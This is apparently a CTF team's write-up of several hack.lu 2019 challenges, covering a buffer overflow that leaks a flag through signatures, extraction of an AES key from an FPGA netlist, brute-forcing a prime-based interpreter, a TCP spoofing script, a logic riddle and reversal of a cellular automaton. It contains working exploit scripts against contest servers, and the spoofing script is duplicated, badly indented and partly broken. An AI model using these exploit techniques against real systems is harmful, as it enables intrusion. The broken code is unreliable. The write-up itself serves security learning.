Lamport Verify

The challenge:

I finally managed to create a signature verification service powered by time, artificial intelligence, the power of music and the randomness of entanglement (well, Leslie and the Emperor Penguin's randomness also helped). It is resistent to all known and unknown attacks and will always be uncrackable. Leave and believe!

Okay, that doesn’t reveal too much.. The challenge contains one file – verify and that’s it.

Reversing verify

After dedicating some time for reversing the binary, we can describe in general what it’s doing:

  1. Read 0x20 bytes from a file named flag.
  2. Read 0x4000 files from a file named secret_key.
  3. Get 0x20 utf-8 characters from user (@ 0x4011A0). We’ll call it user_input.
  4. Verify if the user_input == flag (Time-safe memcmp) (function @ 0x401290).
  5. If verbose (-v) flag is on – print “the signature” (function @ 0x401290).

Locally, we can control the secret_key file, flag file, and user_input. Remotely, we can only control the user_input, and it seems that the verbose option is always on.

Controlling the flag

Looking further into the signature calculation, it seems that the signature is calculated somehow by the flag and secret_key, and it’s our only observable clue about the flag from the server. Our input has no effect whatsoever on the flag calculation.

This begs the question – how can our input change anything? Luckily – it can. The function that grabs utf-8 input from the user has a buffer overflow, which allows us to write bytes past the end of the buffer allocated for input. (Meaning, we can actually write more than 32 BYTES, but seemingly no more than 32 CHARACTERS).

The structure in memory where the buffers are allocated looks like this:

struct glob
{
  char key[16384];
  char flag[32];
  char user_input[32];
  unsigned __int64 ptr_flag;
  unsigned __int64 ptr_user_input;
  unsigned __int64 ptr_key;
  unsigned __int64 verbose;
};

Since we can overflow bytes after the user input, we can controll the ptr_flag field, which is then being used to calculate the signature. If we point ptr_flag to user_input (thanks to no ASLR), we can start controlling the signature calculation, and observe changes in the signature, per our input.

Understanding the signature

After some hand-waving, white-boarding, arguments, trials and failures, we reached the following conclusion – The first 16 lines of the signature (32 bytes * 16) are affected by the first two bytes of the flag. Again, this took some time, trial and error, and simulation using our local binary, and mock test_key and flag files.

The best experiment was using a test_key where each row (32 bytes) has the value of the index of the row. It then really stands out which rows are picked per which combination of bytes.

Extracting the flag

Since we now have an understanding of the signature, and a way to control it, we can do the following:

  1. Send and input which will contain the following: “XX” + stub + (overwrite bytes – ptr_flag points to our input) – where XX are two characters from string.printable.
  2. Observe the first 16 lines of output, and save a dictionary where d[sha1sum(output)] = “XX”. This creates a mapping between each possible characters combination and the output signature it yields.
  3. We do this for each characters combination. It takes a little bit of time to get all the possible outputs from the server.
  4. We now send an input in the following manner: stub + (overwrite bytes ptr_flag points to original flag + index).
  5. The output we receive is affected by the original flag, and since we have every possible output mapped, we can reverse-search the matching characters by using the dictionary – c1c2 = d[sha1sum(new_output)].
  6. We continue this process, but instead of setting ptr_flag to the original flag, we offset the point by 2, to read the next 2 bytes, and repeat the process until we’re done.

…And that’s it! 🙂

As a sidenote / tip:

There’s actually a faster way to do steps 1-3 if you run this “mapping” locally. You first have to grab the first 32 blocks of the original signature. In order to do that, you need to test which bytes yield which rows of the signature (using a local test_key which you know), and then map which rows come out. Send these rows to the server, until you complete the whole 32 byte * 32 rows, and you get your own test_key which matches the server (at least the first, relevant part).

flag sha1sum: 55b09c6c68e3a11ddd776f1e5c96bb800579ff14

Code

import socket
import string
import hashlib
import binascii

mapping = {}

str_list = string.ascii_letters + string.punctuation + string.digits

for char_check1 in str_list:
    for char_check2 in str_list:
        check_pattern = char_check1 + char_check2 + "\x5a"*29 + "\xf0\x90\x80\x40"

        print(char_check1 + char_check2)

        HOST = "lamport.forfuture.fluxfingers.net"
        PORT = 1337

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))

        s.send(check_pattern)
        data = ""
        while len(data) < 1100:
            data += s.recv(1100-len(data))

        k = hashlib.sha1(data).digest()
        if k in mapping.keys():
            raise
        mapping[k] = char_check1 + char_check2
        s.close()

print("Got all mappings")
print(mapping)

flag = ""
for idx in range(16):
    check_pattern = "\x5a"*31 + "\xf0" + chr(0x70+idx*2) + "\x80\x40"

    print(binascii.hexlify(check_pattern))
    HOST = "lamport.forfuture.fluxfingers.net"
    PORT = 1337

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))

    s.send(check_pattern)
    data = ""
    while len(data) < 1100:
        data += s.recv(1100-len(data))

    flag += mapping[hashlib.sha1(data).digest()]
    print(binascii.hexlify(flag))
    s.close()

print(flag)

AES manipulated

The challenge:

Another dimension, the year is 31337. All software has been eliminated and replaced by far superior, configurable hardware. The experiments started in 2019 when the FFF, the Fraternity for FPGA, published an AES implementation. To show the superiority of their design, individuals would receive the greatest honors if they would be able to recover the key although the FFF deemed this to be an impossible challenge.

In this exercise, we are given 2 files – tb.v and aes.vhd. A quick glance at the files as well as the files’ suffix indicate that these are related to Verilog – a language which enables us to write modules to an FPGA.

This exercise becomes significantly easier if one has previous knowledge about Verilog, or Xilinx development environment. This might have a been a problem for some groups, as some tools are necessary (GBs of Vivado installation) to solve this. It might be possible to solve with other methods or tools (we’ll discuss how at the end), but HW development knowledge can obviously help.

Understanding the Challenge

Our first clues are the filenames –

  • tb.v stands for testbench – a common practice in HW development. This is a file that tests a certain HW module by providing it input signals, and testing what output comes out.
  • aes.vhd – As our challenge suggests – the exercise is about AES, and this file represents the implementation of the AES module.

Let’s dig a little deeper…

AES module

As specified, The AES module is present in aes.vhd file. The first section is a comment which gives us some clues. Mostly – this is an AES module, which was compiled for Xilinx boards. “...This VHDL netlist...” – This means this is a compiled version of the Verilog module. We don’t see the code represented as different modules and registers and wires with meaningful names – the Verilog code was compiled to Muxes, Look-Up tables, Flip-Flops etc. Just like C code is compiled into Assembly, Verilog is compiled into HW components.

The module has the following interface, which is pretty self-explanatory:

entity AES128 is
  port (
    CLK : in STD_LOGIC := 'X'; 
    RESET : in STD_LOGIC := 'X'; 
    ENABLE : in STD_LOGIC := 'X'; 
    DONE : out STD_LOGIC; 
    PLAINTEXT : in STD_LOGIC_VECTOR ( 127 downto 0 ); 
    CIPHERTEXT : out STD_LOGIC_VECTOR ( 127 downto 0 ) 
  );
end AES128;
  • CLK – Input signal, specifies clock, which is needed for the module to operate. Probably a Rising/Falling edge.
  • RESET – Input signal. When on, the state is being reset, and nothing happens.
  • ENABLE – Input signal. When on (and reset off), starts the encryption process, and after a certain amount of clock cycles – we should get the output
  • DONE – Output signal. A bit specifying when the encrytion operation is done, and we can start reading the data.
  • PLAINTEXT – 127 Input signals (16 byte). Specifies the plaintext to encrypt.
  • CIPHERTEXT – 127 Input signals (16 byte). Holds the ciphertext once the encryption operation is done.

The thing that is immediately apparent is that the module has no “key” or “iv” inputs. Meaning, it’s supposed to act as a black-box – insert a plaintext, and receive a ciphertext – without specifying the key. This means that the key is a secret, somehow fused into this module, and our guess is that we need to find what it is (as suggested by the exercise’s description).

All the rest of the file describes the internal logic of the module. As said, the module is made up of look-up tables, flip-flops, wires, and muxes. These are used to make up the actual AES encryption logic. Since the code is compiled, we don’t see any “pretty” S-box routines, and byte rotations, but just a lot of binary “a is mapped to b” and “if inputs 1 2 3 are 1, then output is 1”. It’s pretty hard to deduce what the code does this way, and the key somehow got “fused” into the logic. As we’ll soon see, surprisingly, parsing this logic (even though we partially tried) is irrelevant.

Testbench

The testbench file is supposed to operate the AES module in a simulated environment. This means it’s not supposed to run on actual HW, but rather in a simulator that knows how to mimic all the internal signals, wires and registers. Again, this is a common procedure when working with Vivado, or HW development.

Let’s break the code down to understand what happens.

First, we create test registers, and zero them:

module test;
  reg RESET = 0;
  reg ENABLE = 0;
  reg [127:0] PLAINTEXT = 0;

These are the test-bench registers. Later on, the code will wire them to the actual module in order to instrument it.

Then, the test-bench is doing actions at certain points in time. In order to check how the module operates, we need to simulate a clock signal, provide input, and trigger the module to work. After a certain amount of time, we want to see the module’s output.

Now that we understand that – let’s go over the code.
The test-bench sets the RESET register to 1 after 100ns – to make sure everything is being initialized properly. Then, after additional 100ns the ENABLE register is being reset to 0.
After additional 200ns we stop holding the RESET signal at 1, and set it to 0, and 200ns after that we set the ENABLE register to 1. This is the point in time where the module actually starts to operate.

  initial begin
     # 100 RESET = 1;
     # 100 ENABLE = 0;


     # 200 RESET = 0;
     # 200 ENABLE = 1;

     # 3000 $stop;
  end

3000ns after the ENABLE register was set, we stop the simulation. This should be more than enough time to let the module work.

The next piece of code defines a CLK register, and in order to create a CLK signal for the AES module, it negates the register’s value every 10ns.

    reg CLK = 0;
    initial CLK = 0; 
  always #10 CLK = ~CLK; 

This creates a “square wave” pattern:

0 1 0 1 0 1  ...
  _   _   _
_| |_| |_| | ...

Usually, every rising edge (0->1) is used to signal a “pulse”, and this is indeed the case in the AES module.

Next, the code defines a CIPHERTEXT register, which is made up of 127 bits, and DONE register.

Then, the code simply wires the test-bench registers which we’ve just defined, into the AES module registers. Think of it just like connecting wires.

  wire [127:0] CIPHERTEXT;
  wire  DONE;

  AES128 aes128_inst (
    .CLK (CLK),
    .RESET (RESET),
    .ENABLE (ENABLE),
    .DONE (DONE),
    .PLAINTEXT_0 (PLAINTEXT[0]),
    ...
    .CIPHERTEXT_0 (CIPHERTEXT[0]),
    ...

The code monitors the CIPHERTEXT value, but we don’t care for it so much at this point.

  initial
     $monitor("At time %t, value = %h (%0d)",
              $time, CIPHERTEXT, CIPHERTEXT);
endmodule // test

Running the simulation

During the challenge, we spent a fair amount of time trying to understand if any alternative to Xilinx development environment can be found. Perhaps even quickly write a simulation engine ourselves. Downloading Vivado takes a lot of time, and requires a license. Luckily, one of the guys in our team had Vivado already installed, so this sped things up a bit. The alternatives of grabbing a copy somehow or writing a simulator seemed to take a lot of time, and I hope none of the groups failed because some had access to tools that other groups didn’t – a point for thought.

I know that some open-source enviornments do exist, but couldn’t find one that clearly indicated how to process these files, in the limited time-frame of the challenge. If you know otherwise – we’d be happy to know!

Going back to Vivado, it’s relatively easy to run the test-bench (again, previous knowledge is useful here) – Create a new project, add the aes.vhd module, and add the tb.v under the simulation dir tree. Press “Run simulation”, some voodoo will happen, and eventually the simulation will run and we can visually see all the signals, specifically the CIPHERTEXT.

The solution

The solution turns out to be quite simple, a lot simpler than the list of things we initially tried. These include:

  • Clock glitching
  • RESET/ENABLE glitching
  • Deducing the AES key by trying to figure out the 10th round key (which yields the key itself). This included trying to parse some binary Look-Up tables.
  • etc.

The reason I’m writing this is because this was an interesting learning experience, and the easiest solution is sometimes the best.

Eventually, we wanted to gain slightly more insight into the inner workings of the module, to check our sanity. If you look at the aes.vhd file, you will notice the following lines:

  signal signal_1367 : STD_LOGIC_VECTOR ( 127 downto 0 ); 
  signal signal_1368 : STD_LOGIC_VECTOR ( 3 downto 0 ); 
  signal signal_1369 : STD_LOGIC_VECTOR ( 3 downto 0 ); 
  signal signal_1370 : STD_LOGIC_VECTOR ( 127 downto 0 ); 
  signal signal_1371 : STD_LOGIC_VECTOR ( 127 downto 0 ); 
  signal signal_1372 : STD_LOGIC_VECTOR ( 127 downto 0 ); 
  signal signal_1373 : STD_LOGIC_VECTOR ( 127 downto 0 ); 
  signal signal_1374 : STD_LOGIC_VECTOR ( 31 downto 0 ); 
  signal signal_1375 : STD_LOGIC_VECTOR ( 127 downto 0 ); 

These are “inner” wires, which we’re not supposed to see outside the module. The simulation does not provide us the status of each of these lines. These are vectors (simply put, 128 lines, one per bit), which contain some inner state, probably related to the PLAINTEXT, CIPHERTEXT, or both – we didn’t really know. The reason we suspect that is because their length is equal to 128 bits – just like our plain and cipher texts.

So we decided to tap these wires – in the same manner that the module shows output signals, we would output all these vectors and see what happens with them in different points in time. We do so by changing the aes.vhd file like the:

MIDDLETEXT1 : out STD_LOGIC_VECTOR ( 127 downto 0 ) 

... replicate per each vector you want to tap.




OBUF #### has to be unique..

  OBUF_#### : OBUF
    port map (
      I => signal_1367(127),
      O => MIDDLETEXT1(127)
    );
...replicate 128 times, per each signal (per vector, if more than 1)

And the testbench file requires some modification as well:

  wire [127:0] MIDDLETEXT1; ... add as many as you want

    AES128 aes128_inst (
    .CLK (CLK),
    .RESET (RESET),
    .ENABLE (ENABLE),
    .DONE (DONE),
    .PLAINTEXT_0 (PLAINTEXT[0]),
    ...
    .MIDDLETEXT1_0 (MIDDLETEXT1[0])

Doing so for the various internal wires and running the simulation, one can quickly recognize the key – it shows up as hex-encoded ascii characters inside one of the “tap-wires”, at an early stage of the encryption process (right after the ENABLE bit is on).

flag sha1sum: d6a311f5d58c813df40649a459284933d22e40c5

futuretran

solving futuretran 2019@ctf@hack.lu (original URL: https://fluxfingersforfuture.fluxfingers.net/challenges/35)

The task

  • Complex, unsafe languages are the past. We’ve built a new programming language for the future that uses only a fraction of the instructions of RISC. This should be easy, right?
  • In addition we have 2 files, flag.ftb and interpreter.py

Initial analysis of the interpreter.py

  1. Gets 2 parameters, code (flag.ftb) and flag to check
  2. Extracts from the code file the following parameters
    • primes – list of prime numbers sorted starting from 2
    • out – one more prime number
    • state – one more prime number
    • code – list of tuples of 2 mostly not prime numbers formatted as x/y
  3. Expands initial state:
    • multiplies the “state” by prime from the primes list power ord(corresponding character from the flag from command line)
  4. Starts to excecute the “code”:
  • for each tuple in the “code” list of tuples in the order as defined in the input file it tries to multiply the current state by the first member,
  • if the result is divisible by the second number – it divides the state, stores it, and returns to the start of the tuples
  • if no successfull division occured for all the tuples the function returns the current state
  1. Checks result:
  • if the state from the previous stage is not divisible by “out” parameter from the input file – we won

Initial observations on flag.ftb

  1. The list of primes from the file contains 37 first primes
  2. “state” and “out” are also prime numbers, but they are not in the first list of primes
  3. tuples in the code are mostly not primes
  4. after factorization of all the numbers in the flags.ftb we see at all 217 prime numbers (this includes primes list, state and out), from 2 to 1327.
  5. the “out” from flag.ftb is not in the “prime” list from the same file. This means that the only way to mix it into the “state” is successfull multiplication during “code” execution

Work log

It took for me some time to understand what exactly the interpreter.py does but after that the first thing I did was inserting some logging into the “code” execution and looking to the order of executed “code” tuples while analysing obviously false flags like flag{xxxxxxxxxxxx}. In addition I marked prime numbers associated with flag letters as FL_{num}, where num is a number of the letter in the flag and prime number associated with “out” parameter as “INDICATOR”.

Here is what I saw:

  1. There are a long sequences of instructions where primes associated with flag letters are removed from state one by one and factor 257 is added in same quantities.
  2. After each long sequence like this 257 is removed from the state by portions with sizes 64, 32, 16, 8, 4, 2 and 1 and different other primes added each time
  3. After this we have something not too much understandable
  4. Somewhere in the middle of the execution the “out” prime starts to appear in the “state”, which probably means that the flag is incorrect.
  5. Sometimes it is cleared from the “state”, but after that it always returns.

Then I had the first aha moment: whatever RISC program we are running, the “state” is its memory. It looks like that primes in the “state” are similar to variable names, and amount of these primes inside the “state” are these variable values. This actually means that every successful multiplication means addition to all its factors related variables, and division is actually subtraction correspondingly.

Let’s see it on the following example:

  • if state equals to 30 (235) it can be represented as 3 variables labeled v2, v3, and v5, and their values are {1,1,1} correspondingly.
  • if we want to multiply it by 3 and divide it by 5, the resulting state will look like {1, 2, 0} correspondingly and so on.

After understanding that I updated the logging and started to see there more understandable logs like this:

96 { FL_1:1,svc601:1,} { CNT:1,svc599:1,} # number of current “instruction” in the “code” {factorized first number of the tuple} {factorized second number of the tuple}
[ FL_1 ]: 64 –> 63 # amount of primes associated with 2nd letter of the flag decremented by 1
[ CNT ]: 44 –> 45 # a variable associated with prime 257 incremented by 1
[ svc599 ]: 0 –> 1 # service variable associated with 599 decremented
[ svc601 ]: 1 –> 0 # service variable associated with 601 incremented
95 { svc599:1,} { svc601:1,}
[ svc599 ]: 1 –> 0
[ svc601 ]: 0 –> 1
96 { FL_1:1,svc601:1,} { CNT:1,svc599:1,}
[ FL_1 ]: 63 –> 62
[ CNT ]: 45 –> 46
[ svc599 ]: 0 –> 1
[ svc601 ]: 1 –> 0
95 { svc599:1,} { svc601:1,}
[ svc599 ]: 1 –> 0
[ svc601 ]: 0 –> 1
96 { FL_1:1,svc601:1,} { CNT:1,svc601:1,}
[ FL_1 ]: 62 –> 61
[ CNT ]: 46 –> 47
[ svc599 ]: 0 –> 1
[ svc601 ]: 1 –> 0
95 { svc599:1,} { svc601:1,}
[ svc599 ]: 1 –> 0
[ svc601 ]: 0 –> 1

OK, stores and loads of our RISC program are understood.

And then (after a lot of staring into the logs in order to find control flow instructions and mapping service variables)
I had the second aha moment:
I don’t need the program. I don’t need to understand the meaning of each specific variable. I probably don’t need to reverse the “program” at all.
Traces are probably enough. We just need to avoid appearance of “out” as a factor in state.

After that I started to analyze the loads and stores of execution order. And then I understood
that the full log of the execution looks like following:

  • do something not clear
  • decrease FL_0 and increase CNT
  • do something with CNT
  • do something not clear
  • decrease FL_1 and increase CNT
  • do something with CNT
  • do something not clear
  • decrease FL_2 and increase CNT
  • do something with CNT
  • do something not clear
  • decrease FL_3 and increase CNT
  • do something with CNT
  • do something not clear
  • decrease FL_4 and increase CNT
  • do something with CNT
  • do something not clear
  • decrease FL_5 and increase CNT <– it looks like that here we are checking the first letter in the flag that we don’t know (the start of flag is known: flag{ )
    • do something with CNT
    • do something not clear
    • INDICATOR starts to change <– here we see evidence of the problem
    • do something not clear
    • decrease FL_6 and increase CNT
    • do something with CNT
    • do something not clear
    • INDICATOR starts to change <– problem persists
    • do something not clear
    • decrease FL_7 and increase CNT
    • do something with CNT
    • do something not clear
    • INDICATOR starts to change <– problem persists
      ………
    • return wrong value

I checked it with “fla” instead of “flag{” in the start of the flag. The problem started to appear earlier in trace. Understanding this allowed me to build the brute force which actually does the following:

    for c in flag_alphabet:
        current_flag += c
        for (a,b) in "code":
            store last letter index we worked with
            return the last letter if we see that "INDICATOR" is in
        if we see advance in letter index, remember the flag and break

The script is attached, here is the partial log of its run, and as you can see it runs around 20 minutes only:

╰─$ date; ./brute.py flag.ftb sss
Thu Oct 24 16:52:03 IDT 2019
Starting … {2: 10, 3: 1}
primes
[2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157]
out
163 {163: 1}
state
269 {269: 1}
code
[2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443, 449, 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577, 587, 593, 599, 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701, 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839, 853, 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983, 991, 997, 1009, 1013, 1019, 1021, 1031, 1033, 1039, 1049, 1051, 1061, 1063, 1069, 1087, 1091, 1093, 1097, 1103, 1109, 1117, 1123, 1129, 1151, 1153, 1163, 1171, 1181, 1187, 1193, 1201, 1213, 1217, 1223, 1229, 1231, 1237, 1249, 1259, 1277, 1279, 1283, 1289, 1291, 1297, 1301, 1303, 1307, 1319, 1321, 1327] 217
flag{o} FL_6
Thu Oct 24 16:52:06 IDT 2019
flag{on} FL_7
Thu Oct 24 16:52:10 IDT 2019
flag{onl} FL_8
Thu Oct 24 16:52:14 IDT 2019
flag{only} FL_9
Thu Oct 24 16:52:25 IDT 2019
… skipped …
… skipped …
… skipped …
… skipped …
flag{only_a_fraction_find_this_} FL_31
Thu Oct 24 17:01:47 IDT 2019
flag{only_a_fraction_find_this_f} FL_32
Thu Oct 24 17:02:32 IDT 2019
flag{only_a_fraction_find_this_fu} FL_33
Thu Oct 24 17:04:51 IDT 2019
flag{only_a_fraction_find_this_fun} FL_34
Thu Oct 24 17:06:35 IDT 2019
flag{only_a_fraction_find_this_funn} FL_35
Thu Oct 24 17:08:26 IDT 2019
flag{only_a_fraction_find_this_funny} 1327
Thu Oct 24 17:11:50 IDT 2019

from scapy.all import *
import sys
import socket
from time import sleep
import re

hostname = "31.22.123.60"
port = 1337 

while True:
     sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     sock.connect((hostname, port))
     data_in = sock.recv(256)
     sport=1234
     token = data_in.split(b"\n")[1].split(b": ")[1]
     tcp_port0 = int(data_in.split(b"\n")[2].split(b" ")[-1])
     ip = IP(dst="31.22.123.60")
     tcp = TCP(sport=23995,dport=tcp_port0, flags="S")
     data = token
     sleep(2)
     send(ip/tcp/data)
     data_in = sock.recv(256)
     print(data_in)
     data_in = sock.recv(256)
     print(data_in)
     #for i in range(0x10000):
     #sport = i
     tcp_port = int(data_in.split(b",")[1].split(b" ")[-1])
     seq_number = int(data_in.split(b",")[2].split(b" ")[-1])
     ip = IP(dst="31.22.123.60")
     tcp = TCP(sport=37614,dport=tcp_port, flags="S", seq=seq_number)
     print("token: {0},first tcp port:{1},hex:{2},second tcp port:{3},hex:{4}sequence number:{5}".format(data, tcp_port0, hex(tcp_port0),tcp_port, hex(tcp_port), seq_number))
     sleep(2)
     print ("Sending packet with SEQ as requested")
     send(ip/tcp/data)
     #packets=sniff(filter="host %s" % hostname, count=1)

while True:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((hostname, port))
data_in = sock.recv(256)
sport=1234
token = data_in.split(b"\n")[1].split(b": ")[1]
tcp_port0 = int(data_in.split(b"\n")[2].split(b" ")[-1])
ip = IP(dst="31.22.123.60")
tcp = TCP(sport=23995,dport=tcp_port0, flags="S")
data = token
sleep(2)
send(ip/tcp/data)
data_in = sock.recv(256)
print(data_in)
data_in = sock.recv(256)
print(data_in)
#for i in range(0x10000):
#sport = i
tcp_port = int(data_in.split(b",")[1].split(b" ")[-1])
seq_number = int(data_in.split(b",")[2].split(b" ")[-1])
ip = IP(dst="31.22.123.60")
tcp = TCP(sport=37614,dport=tcp_port, flags="S", seq=seq_number)
print("token: {0},first tcp port:{1},hex:{2},second tcp port:{3},hex:{4}sequence number:{5}".format(data, tcp_port0, hex(tcp_port0),tcp_port, hex(tcp_port), seq_number))
sleep(2)
print ("Sending packet with SEQ as requested")
send(ip/tcp/data)
#packets=sniff(filter="host %s" % hostname, count=1)

line = input("Give me tcpdump: ")
 m = re.search("seq (\d+), ack (\d+)", line)
 if not m:
     exit(1)

seq=int(m.group(1))
 ack=int(m.group(2))

packet=packets[0][0][1][TCP]

tcp = TCP(sport=37614, dport=tcp_port, flags="A", seq=ack, ack=seq)
 print ("Sending ACK")
 send(ip/tcp/data)

data_in = sock.recv(256)
 print("From 1337:", data_in)

for i in range(seq-ack):
tcp = TCP(sport=37614, dport=tcp_port, flags="S", seq=ack+i, ack=seq)
print ("Sending packet #%d synchronize"% i)
send(ip/tcp/"synchronize")
sleep(0.4)
data_in = sock.recv(256)
print("From 1337:", data_in)
sleep(0.5)
 tcp = TCP(sport=37614, dport=tcp_port, flags="S", seq=seq, ack=seq)
 print ("Sending packet privileged")
 send(ip/tcp/"privileged")

data_in = sock.recv(256)
 print(data_in)

tcp = TCP(sport=37614, dport=tcp_port, flags="S", seq=seq, ack=seq)
 print ("Sending packet flag")
 send(ip/tcp/"flag")

data_in = sock.recv(256)
 print(data_in)
 data_in = sock.recv(256)
 print(data_in)
break

breaktime riddle

Understanding the question:

There are 2 files on the server – riddle.py and secret.py – if you solve riddle.py the secret.py consisting the flag is printed. The riddle itself is somewhat of an alteration to the classic “liars riddle” – given 3 people – one that always tells the truth, one that always tells a lie and one that can tell a lie and can tell the truth, detect who is who by asking anyone of them 3 questions.

Variable of this riddle:

t1: a tuple of lambdas – one that always returns the same output as input – AKA the truth teller (on true expression it returns that it is true and on False expression it returns that is false), one that returns not on the expression (AKA the liar) and one that returns random choice between true and false. (do_round)

t2: a tuple of the truth teller and the liar. (do_round)

m1: the order of the liar, truth teller and random teller (this is what we look for) – in the Q&A format, A is the first index of m1, B is the second and C is the third. (calc)

m2: called X in our Q&A (calc) – this indicates whether or not our expression will remain the same or be the opposite. (calc returns t2[X] on the manipulated expression)

i: (calc) the function we choose to use (AKA the person we choose to ask)

r: (calc) the expression we input (AKA the question we ask).

Q&A understanding:

We have a question syntax that allows us to choose which function we use in t1 and check whether A,B,C (what we look for), X, ==, 0, 1, 2 are equal, and using ‘(‘ and ‘)’ we can ask multiple equals on the same question (for example we can ask 0 X==2 or 0 (X==2)==(A==1))

The answer of the question: t2[X](t1[m1[i]](r)) – m1[i] – the index of the function we use on t1 – (m1 is randomized) running it on our question (r) and running t2[X] on the expression we received from (t1[m1[i]](r)) – which can return the expression as is or return the opposite.

The solution:

We need to get A,B and C after 3 questions. Our goal after the first question, is to get an index in m1 that is not 2 (the random function). In the first question we have 0 information, so we use index 0 in our question (we use the A (m1[0]) function of t1), and want to receive an answer that gives us which of the m1[indexes] (B or C) is not 2 (random) for sure. If A is 2 –the answer doesn’t matter – anyway we will get a non-random function. If m1[0]=A is 1, if X=1 we will return the expression (false on false = true) and if X=0 we will return the opposite of the expression (true(false) = false) – so expanding this logic to A=0 will bring us (X==A) == (B==2) will return whether C is definitely not 2 (random) or B is definitely not 2. (false)

After the first question we know an index that is not 2. Let’s assume it is C (if it was B, then replace the index of m1 to be 1 and replace every C reference with B – it is symmetric). So now we want to understand whether C is 0 or 1 (truth teller or false teller) – 2 (use m1[C]) (X == C) is telling us whether the expression returned is “as is” if true or the opposite if false, and if we will ask this: 2 (X == C) == (C == 0) we will know if C is truth teller or liar.

YAY – now we know if C (in our assumption) is 0 or 1. Let’s assume it is 0 – so t1[C] will return the expression as is. Now we need to understand who is 1 and who is 2 (from A and B). OK – so 2 (X == C) == (B == 2) will return whether or not B is 2 – and that’s it (A is not B and not C) J now we asked 3 questions and we know what is A, what is B and what is C – AKA m1 J

Reverse Cellular Automata

Image

We were given a single random step in a cellular automata which follows Wolfram rule 126 and its boundary condition wraps around so that the last bit is a neighbor of the first bit – 0x66de3c1bf87fdfcf .
The following image represents rule 126 by describing all possible cases and outcomes:

In order to catch the flag, we first must reverse the given step and find its previous step.
Though there can be multiple previous steps which will generate the given step. The idea is to minimize that list of possible previous steps to the minimum.
To achieve that, we can deduce the relationship between the different bits of the previous step by looking at the current step bits.
For example, if the current step is 11011, we can know for sure (because of that middle ‘0’), the corresponding previous step should be something like ?xxx? where ‘x’ is either 0 or 1. In addition (because of all other ‘1’ occurrences) we can know that there cannot be another sequence of 3 ‘x’ in the previous step (if there was, we should see more ‘0’ occurrences in the current step). So, obviously, we know that the previous step should be (!x)xxx(!x) which means either 01110 or 10001.

Following this concept, lets look on the binary representation of the actual given step:
0110011011011110001111000001101111111000011111111101111111001111
Assuming a is either 0 or 1 and b = !a, we can deduce part of the pattern of the previous step:

aabbbbaaabbba_________________________________________________ba
0110011011011110001111000001101111111000011111111101111111001111

Given another pair cd (where c is either 0 or 1 and d = !c), we can deduce another part:

_____________cdddddc____________________________________________
0110011011011110001111000001101111111000011111111101111111001111

Similarly, for pairs ef, gh, ij, kl:

____________________efffffffeeef________________________________
___________________________________ghhhhhhg_____________________
________________________________________________jiiij___________
________________________________________________________lkkkkl__
0110011011011110001111000001101111111000011111111101111111001111

Combining all parts we get the pattern:

aabbbbaaabbbacdddddcefffffffeeef___ghhhhhhg_____jiiij___lkkkklba
0110011011011110001111000001101111111000011111111101111111001111

We still got 2 sequences of 3 bits and 1 sequence of 5 bits which we couldn’t get a pattern for but we do know there cannot be any sequence of 3 of the same bit in a row in them (Otherwise we should see another ‘0’ in the current step). The 3 bit sequences must be one of [001,010,011,100,101,110] while the 5 bit sequence must be one of [00100,00101,00110,01001,01010,01011,01100,01101,10010,10011,10100,10101,10110,11001,11010,11011].

Now that we have a pretty strict pattern, we can generate all possible previous steps by constructing a binary string using this simple and dirty python script:

dic = ['0','1']
indx = [0,1]

seq3 = [(0,0,1),(0,1,0),(0,1,1),(1,0,0),(1,0,1),(1,1,0)]
seq5 = [(0,0,1,0,0),(0,0,1,0,1),(0,0,1,1,0),(0,1,0,0,1),(0,1,0,1,0),(0,1,0,1,1),(0,1,1,0,0),(0,1,1,0,1),(1,0,0,1,0),(1,0,0,1,1),(1,0,1,0,0),(1,0,1,0,1),(1,0,1,1,0),(1,1,0,0,1),(1,1,0,1,0),(1,1,0,1,1)]

for a in indx:
  for c in indx:
    for e in indx:
      for g in indx:
        for i in indx:
          for k in indx:
            for un1 in seq3:
              for un2 in seq5:
                for un3 in seq3:
                  bin_str = (dic[a]*2)+(dic[1-a]*4)+(dic[a]*3)+(dic[1-a]*3)+(dic[a]) + (dic[1-c])+(dic[c]*5)+(dic[1-c]) + (dic[1-e])+(dic[e]*7)+(dic[1-e]*3)+(dic[e]) + dic[un1[0]]+dic[un1[1]]+dic[un1[2]] + (dic[1-g])+(dic[g]*6)+(dic[1-g]) + dic[un2[0]]+dic[un2[1]]+dic[un2[2]]+dic[un2[3]]+dic[un2[4]] + (dic[1-i])+(dic[i]*3)+(dic[1-i]) + dic[un3[0]]+dic[un3[1]]+dic[un3[2]] + (dic[1-k])+(dic[k]*4)+(dic[1-k]) + (dic[1-a])+(dic[a])
                  print(bin_str)

This script will generate exactly 36864 possible previous steps. This is by far less than 2^64 (18446744073709551616):

...
1100001110001011111001111111000111001111110010110111010101111001
1100001110001011111001111111000111001111110010110111011001111001
1100001110001011111001111111000111001111110011000111000101111001
1100001110001011111001111111000111001111110011000111001001111001
1100001110001011111001111111000111001111110011000111001101111001
...

